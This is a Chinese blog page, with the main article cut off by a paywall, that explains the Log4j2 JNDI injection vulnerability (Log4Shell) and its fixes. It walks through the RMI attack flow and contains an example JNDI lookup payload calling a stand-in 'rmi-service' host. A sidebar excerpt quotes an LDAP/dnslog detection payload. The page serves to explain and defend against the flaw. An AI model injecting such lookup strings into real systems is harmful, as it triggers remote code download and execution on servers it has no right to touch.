Apache Log4j2.x RCE命令执行漏洞攻击原理及修复措施

最新推荐文章于 2025-05-23 18:19:08 发布
最新推荐文章于 2025-05-23 18:19:08 发布
阅读量4k 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: SpringBoot 架构 文章标签: 安全 web安全 log4j2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wangpf2011/article/details/122114584

截止2021.12.20,短短几天Log4j2.x已经连发3个版本,用以修复RCE命令执行漏洞,Log4j2漏洞总体来说是通过JNDI注入恶意代码来完成攻击,具体的操作方式有RMI和LDAP等。

一、攻击原理

以RMI为例,简单阐述下该漏洞的攻击原理:

1、攻击者首先发布一个RMI服务,此服务将绑定一个引用类型的RMI对象。在引用对象中指定一个远程的含有恶意代码的类。

2、攻击者再发布另一个恶意代码下载服务,此服务可以下载所有含有恶意代码的类。

3、攻击者利用Log4j2的漏洞注入RMI调用,例如: log.info("登录成功", "${jndi:rmi://rmi-service:1188/hackedclass}");

4、调用RMI后将获取到引用类型的RMI远程对象࿰

最低0.47元/天 解锁文章
log4j2漏洞原理漏洞环境搭建复现
dreamthe的博客
03-03 1万+
背景 2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2Apache Solr、Apache Druid、Apache Flink等均受影响。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击log4j3远程代码执行漏洞主要由于存在JN
#渗透测试#批量漏洞挖掘#Apache Log4j反序列化命令执行漏洞
soc的博客
02-18 1378
检测逻辑方面,可能需要检查目标是否开放了Log4j SocketServer的端口,默认是4560。所以脚本需要尝试连接目标的4560端口,然后发送特定的探测数据,观察响应。如果端口开放但无响应,或者有特定异常,可能判断存在漏洞。或者通过版本检测,比如如果HTTP响应头里包含Log4j 1.x的版本信息,可以辅助判断。
Apache Log4j2详解
热门推荐
ThinkWon的博客
07-08 1万+
在项目开发中,都不可避免的使用到日志。没有日志虽然不会影响项目的正确运行,但是没有日志的项目可以说是不完整的。日志在调试,错误或者异常定位,数据分析中的作用是不言而喻的。 日志作用 调试 在Java项目调试时,查看栈信息可以方便地知道当前程序的运行状态,输出的日志便于记录程序在之前的运行结果。如果你大量使用System.out或者System.err,这是一种最方便最有效的方法,但显得不够专业。 ...
重新理解Log4Shell (CVE-2021-44228)漏洞原理,从零基础到精通,收藏这篇就够了!
最新发布
QIANDXX的博客
05-23 874
Log4Shell 漏洞是一个影响广泛、危害严重的漏洞。及时升级 Log4j 版本,或者采取临时缓解措施,并加强输入验证,是防御该漏洞的关键。
log4j2-rce-2021-12-09漏洞原理及复现
qq_50854662的博客
10-15 1085
log4j2-rce-2021-12-09漏洞原理及复现
Log4j2漏洞修复
running_pork的博客
12-16 3254
文章目录一、漏洞二、修复漏洞2.1 SpringMVC项目修复2.2 SpringBoot项目修复三、如何攻击漏洞 一、漏洞 近期一个 Apache Log4j 远程代码执行漏洞细节被公开,攻击利用漏洞可以远程执行代码。经过分析,该组件存在Java JNDI注入漏洞,当程序将用户输入的数据进行日志,即可触发此漏洞,成功利用漏洞可以在目标服务器上执行任意代码。 Apache Log4j2 是一款优秀的 Java 日志框架。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系
Apache Log4j2,RASP 防御优势及原理
阿里巴巴云原生的博客
12-17 410
免费公测中!
Apache Log4j2 Jndi RCE CVE-2021-44228漏洞原理讲解
m0_62670778的博客
04-06 1598
Log4j2(Log for java)是Apache软件基金会下一个优秀的java程序日志监控组件Log4j2远程代码执行漏洞细节被公开【影响版本Log4j 2.x
log4j2漏洞终极解决方法 apache-log4j-2.16.0-bin.zip
12-14
Apache Log4j2漏洞详解及修复指南》 在网络安全领域,Apache Log4j2漏洞是一个备受关注的话题,尤其在2021年底,该漏洞的出现引发了全球范围内的广泛关注。这个漏洞,被称为CVE-2021-44228,影响了广泛使用的Java...
log4j RCE漏洞原理分析及检测_log4j 漏洞监测
2401_84254343的博客
04-28 380
jdk将从url指定的路径下载一段字节流,并将其反序列化为Java对象,作为jndi返回。反序列化过程中,即会执行字节流中包含的程序。因此,如果攻击者能够控制日志打印的内容,就可以使目标服务器从攻击者指定的任意url地址下载代码字节流,攻击者在字节流中附带的代码就会在目标服务器上执行。那么问题来了,攻击者如何控制服务器上记录的日志内容呢?非常简单!大部分web服务程序都会对用户输入进行日志记录。
apache-log4j-2.3 核心jar包
12-28
log4j 2.3版本Jar包。 eclipse ADD extenal library即可 **log4j-api-2.x 和 log4j-core-2.x是必须的,其他包根据需要引入, Common Logging Bridge: log4j-jcl-2.3 Log4j 2log4j 1.x和logback的改进版,据说采用了一些新技术(无锁异步、等等),使得日志的吞吐量、性能比log4j 1.x提高10倍,并解决了一些死锁的bug,而且配置更加简单灵活。
Log4j 2.x入门
码农的世界
03-17 1488
一、引入Log4j 2.x.jar 要在项目中使用Log4j 2.x,首先得引入Log4j 2.x所必须的jar包: log4j-api-2.2.jar log4j-core-2.2.jar 直接下载apache-log4j-2.2-bin.zip,解压到任意目录,找到上述两个jar包,并将它们加入到classpath中即可。也可以使用Maven管理jar包,只需要找到pom.xm
Apache Log4j 2教程
一名可爱的技术搬运工
05-31 1635
一个简单的log4j 2 hello world示例。 经过测试 Log4j 2.11.2 Maven 3 Java 8 注意 最快的Java日志记录框架 Apache Log4j 2,对其前身Log4j 1.x进行了重大改进。 1.项目目录 2. Maven <dependency> <groupId>org...
log4j RCE漏洞原理分析及检测_log4j 漏洞监测,网络安全开发基础学习
2401_83621004的博客
04-15 809
漏洞检测时,可以使用 ${jndi:ldap://http://xxx.dnslog.cn} ,如果攻击成功,目标服务器将会从 xxx.dnslog.cn 下载jndi字节流,下载之前首先得连接dnslog.cn进行xxx.dnslog.cn的域名解析,获得真实ip地址。dnslog.cn 是安全检测常用工具之一,在其主页上点击 Get SubDomain 即可以自动生成一个 dnslog.cn 的子域名,这个子域名解析出来的ip是 127.0.0.1,也就是本机地址。因篇幅有限,仅展示部分资料。
漏洞复现-log4j2远程代码执行漏洞
qq_43381463的博客
03-09 504
漏洞编号:CVE-2021-44228
2024年网络安全最全log4j RCE漏洞原理分析及检测_log4j 漏洞监测
2401_84297193的博客
05-03 661
log4j支持使用表达式的形式打印日志,比如问题就在与表达式支持非常多样,其中有一个jndi就是今天的主题jdk将从url指定的路径下载一段字节流,并将其反序列化为Java对象,作为jndi返回。反序列化过程中,即会执行字节流中包含的程序。因此,如果攻击者能够控制日志打印的内容,就可以使目标服务器从攻击者指定的任意url地址下载代码字节流,攻击者在字节流中附带的代码就会在目标服务器上执行。那么问题来了,攻击者如何控制服务器上记录的日志内容呢?非常简单!大部分web服务程序都会对用户输入进行日志记录。
log4j2.x教程和实战
赶路人儿
12-12 1124
log4j 2.x 官网:https://logging.apache.org/log4j/2.x/index.html Apache Log4j 2Log4j的升级版,对Log4j 1.x进行了重大改进,并提供了Logback中可用的许多改进,同时解决了Logback体系结构中的一些固有问题。 注:log4j1.x的包时org.apach.log4jlog4j2.x的包名是org.apach.logging.log4j Log4j 2包含基于LMAX Disruptor库的下一代异步记录器。在多
Apache Log4j2 - JNDI RCE漏洞攻击保姆级教程(仅供测试请勿攻击他人)
搬山境KL攻城狮的修炼手册
12-12 1万+
近日,Java日志组件Log4j2爆出严重0 day漏洞,吓得我赶紧研究了一下,不看不知道,这玩意的严重程度极高,达到10分,且易于利用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值